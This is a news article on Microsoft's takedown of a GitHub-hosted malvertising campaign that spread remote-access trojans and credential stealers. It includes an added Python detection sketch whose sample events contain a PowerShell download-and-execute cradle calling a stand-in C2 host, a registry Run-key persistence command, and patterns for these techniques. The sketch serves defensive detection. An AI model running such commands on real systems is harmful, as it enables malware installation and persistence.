Microsoft has moved swiftly to dismantle a vast malvertising campaign that leveraged GitHub repositories to distribute malware to nearly one million devices worldwide. The tech giant’s security team uncovered the campaign in early December 2024, tracing a series of malicious redirects that funneled unsuspecting users from pirated streaming sites to malware-hosting GitHub repositories.
The attack vector was deceptively simple yet highly effective. Cybercriminals injected malvertising scripts into video streams on illegal streaming platforms, which then rerouted victims through multiple redirectors before landing them on a GitHub page housing the malware. Microsoft’s analysis revealed that the threat actors behind the campaign employed an intricate multi-stage payload deployment process to infiltrate and compromise devices.
A Layered Attack Chain
Once a user landed on the malicious GitHub page, their device was infected with a first-stage malware designed to conduct reconnaissance, harvesting critical system details such as memory capacity, operating system information, screen resolution, and even user paths. This data was then exfiltrated, triggering the deployment of secondary payloads.
The attack escalated with a third-stage PowerShell script, which retrieved the NetSupport remote access trojan (RAT) from a command-and-control (C2) server and stored it in the Windows registry to ensure persistence. This RAT opened the door to further infections, including the Lumma and Doenerium information stealers, which siphoned browser credentials and other sensitive user data.
Alternatively, in cases where the third-stage payload was an executable file, it deployed a sequence of scripts and renamed components of the AutoIt interpreter to further obfuscate its presence. These scripts enabled persistence, facilitated additional malware execution, and allowed attackers to manipulate system files using PowerShell commands. In advanced stages, attackers used PowerShell and RegAsm to disable security defenses, execute hidden files, and establish remote browser debugging.
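Each of the stages described above leaves a process-creation trace that a defender can hunt for. The Python sketch below is an added illustration, not code from the article or from Microsoft's report: it runs a handful of rules over constructed Sysmon-style process events and flags the behaviours the article names (a PowerShell download cradle, a Run-key registry entry, an AutoIt interpreter running under a different file name, RegAsm.exe spawned from a scripting host or a user-writable directory, and a browser launched with remote debugging enabled). The sample paths, the assumption that the NetSupport client runs as client32.exe, and the rule names are mine, not indicators from the campaign.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 provides)."""
    image: str               # full path of the new process
    cmdline: str             # its command line
    parent: str              # full path of the parent process
    original_name: str = ""  # PE OriginalFileName; survives renaming of the file on disk


# Patterns for the behaviours described in the article (heuristics, not campaign IoCs).
DOWNLOAD_CRADLE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient"
    r"|start-bitstransfer|\s-enc(odedcommand)?\s)", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run", re.I)
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "autoit3.exe", "mshta.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\public\\", "\\programdata\\", "\\downloads\\")


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def user_writable(path):
    """True if the path sits under a directory an unprivileged user can write to."""
    low = path.lower()
    return any(seg in low for seg in USER_WRITABLE)


def classify(ev):
    """Return the list of rule names this event triggers (empty list = nothing suspicious)."""
    hits = []
    img, par = basename(ev.image), basename(ev.parent)
    if img in ("powershell.exe", "pwsh.exe") and DOWNLOAD_CRADLE.search(ev.cmdline):
        hits.append("powershell_download_cradle")          # stage-3 script fetching a payload
    if img in ("reg.exe", "powershell.exe", "pwsh.exe") and RUN_KEY.search(ev.cmdline):
        hits.append("run_key_persistence")                 # registry autorun entry
    if ev.original_name.lower() == "autoit3.exe" and img != "autoit3.exe":
        hits.append("renamed_autoit_interpreter")          # interpreter renamed on disk
    if img == "regasm.exe" and (par in SCRIPT_HOSTS or user_writable(ev.parent)):
        hits.append("regasm_suspicious_parent")            # RegAsm driven by a script/loader
    if img in BROWSERS and "--remote-debugging-port" in ev.cmdline.lower():
        hits.append("browser_remote_debugging")            # browser opened for remote control
    if img == "client32.exe" and user_writable(ev.image):  # assumed NetSupport client name
        hits.append("netsupport_client_unusual_path")
    return hits


def scan(events):
    """Return (index, hits) for every event that triggered at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := classify(ev))]


# Constructed sample events: index 0 is benign, 1..6 each model one stage from the article.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              "chrome.exe https://example.invalid/", r"C:\Windows\explorer.exe", "chrome.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://c2.example.invalid/s3.ps1')\"",
              r"C:\Windows\System32\wscript.exe", "PowerShell.EXE"),
    ProcEvent(r"C:\Windows\System32\reg.exe",
              r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater "
              r"/d C:\Users\alice\AppData\Roaming\svc\client32.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "reg.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\upd\vlc.exe",
              r"vlc.exe C:\Users\alice\AppData\Local\Temp\upd\run.a3x",
              r"C:\Windows\System32\cmd.exe", "AutoIt3.exe"),
    ProcEvent(r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", "RegAsm.exe",
              r"C:\Users\alice\AppData\Local\Temp\upd\vlc.exe", "RegAsm.exe"),
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              "chrome.exe --remote-debugging-port=9222 --headless --user-data-dir=C:\\tmp\\p",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "chrome.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Roaming\svc\client32.exe", "client32.exe",
              r"C:\Windows\explorer.exe", "client32.exe"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The renamed-interpreter rule is the one worth copying into a real pipeline: it keys on the PE's OriginalFileName rather than the on-disk name, so renaming AutoIt3.exe to something innocuous does not defeat it. The RegAsm and browser-debugging rules are parent- and argument-based heuristics and will need tuning against legitimate developer activity in your environment.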
While GitHub served as the primary hosting platform for initial payloads, Microsoft Threat Intelligence noted that the attackers also leveraged other popular platforms, including Dropbox and Discord, to distribute malware at various stages of the campaign.
A Sophisticated and Evasive Threat
Security experts believe that the threat actors behind this campaign are part of a larger Malware-as-a-Service (MaaS) ecosystem. Ensar Seker, CSO at SOCRadar, underscored the attackers’ use of advanced obfuscation techniques to evade detection.
“The attackers used geofencing, device fingerprinting, and cloaking techniques to evade detection, which means the malicious payload is only delivered to targeted users, making it harder for security solutions to track and mitigate the campaign,” Seker explained. “This campaign is likely part of a broader MaaS ecosystem, where attackers use pre-built malvertising kits to distribute payloads like stealers, ransomware, and banking trojans.
Malvertising has traditionally targeted Windows users, but with more professionals using macOS and Linux, we’ll see cross-platform payloads becoming more common.”
Microsoft is tracking the group behind this attack under the name Storm-0408, linking them to a broader network of cybercriminals specializing in remote access malware and information theft. Their tactics include phishing campaigns, search engine optimization (SEO) manipulation, and large-scale malvertising operations like this one.
The Rising Threat of Malvertising
The scale and complexity of this campaign highlight the growing threat posed by malvertising. By embedding malicious ads within high-traffic streaming sites, cybercriminals can effectively bypass traditional security measures and compromise vast numbers of users without requiring direct interaction, such as clicking a suspicious email link or downloading an unknown file.
Microsoft’s swift action in dismantling the GitHub repositories used in this campaign is a significant step in disrupting the attackers’ operations. However, the reliance on cloud-based platforms like GitHub, Dropbox, and Discord for malware distribution underscores the persistent challenge of securing widely used digital ecosystems.
As malvertising techniques evolve, enterprises and individual users alike must remain vigilant. Ensuring robust endpoint protection, avoiding pirated content sites, and staying informed about emerging threats will be crucial in mitigating the risks posed by increasingly sophisticated cybercriminal campaigns.